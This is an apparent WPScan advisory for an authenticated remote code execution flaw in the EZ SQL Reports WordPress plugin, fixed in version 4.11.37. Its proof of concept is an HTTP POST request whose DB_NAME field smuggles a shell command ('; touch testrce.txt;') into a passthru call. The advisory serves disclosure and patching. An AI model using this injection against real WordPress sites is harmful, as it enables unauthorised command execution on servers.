EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary Code Execution

Sign up to our free email alerts service for instant vulnerability notifications!

Description
There are several calls to "passtthru" in the code, one of them is receiving the username, password, database name and host from the $_POST arguments, so you can inject in every of this parameter the ";" character or others like "&&" or "||" to execute other distinct commands to "/usr/bin/mysql".
Proof of Concept
POST /wp-admin/admin.php?page=ELISQLREPORTS-settings HTTP/1.1
Host: <wordpress web>
Proxy-Connection: keep-alive
Content-Length: 177
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://<wordpress web>
Upgrade-Insecure-Requests: 1
User-Agent: <the user agent>
Content-Type: application/x-www-form-urlencoded
Referer: http://<wordpress web>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_8fa[...etc...]b7d
 
DB_NAME=<the db
name>%3B+touch+testrce.txt%3B+&DB_HOST=127.0.0.1&DB_USER=<theuser>&DB_PASSWORD=<thepassword>&db_date=z.2015-08-27-20-22-29.manual.wp.127.0.0.1.sql.zip&db_nonce=au78c5ff86

Affects

Plugin elisqlreports
fixed in version 4.11.37

References

EXPLOITDB 38176

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Felipe Moline
Submitter Twitter felmoltor
Views 137
Verified No
WPVDB ID 8185

Timeline

Publicly Published 2015-09-14 (about 1 year ago)
Added 2015-09-15 (about 1 year ago)
Last Updated 2015-09-15 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.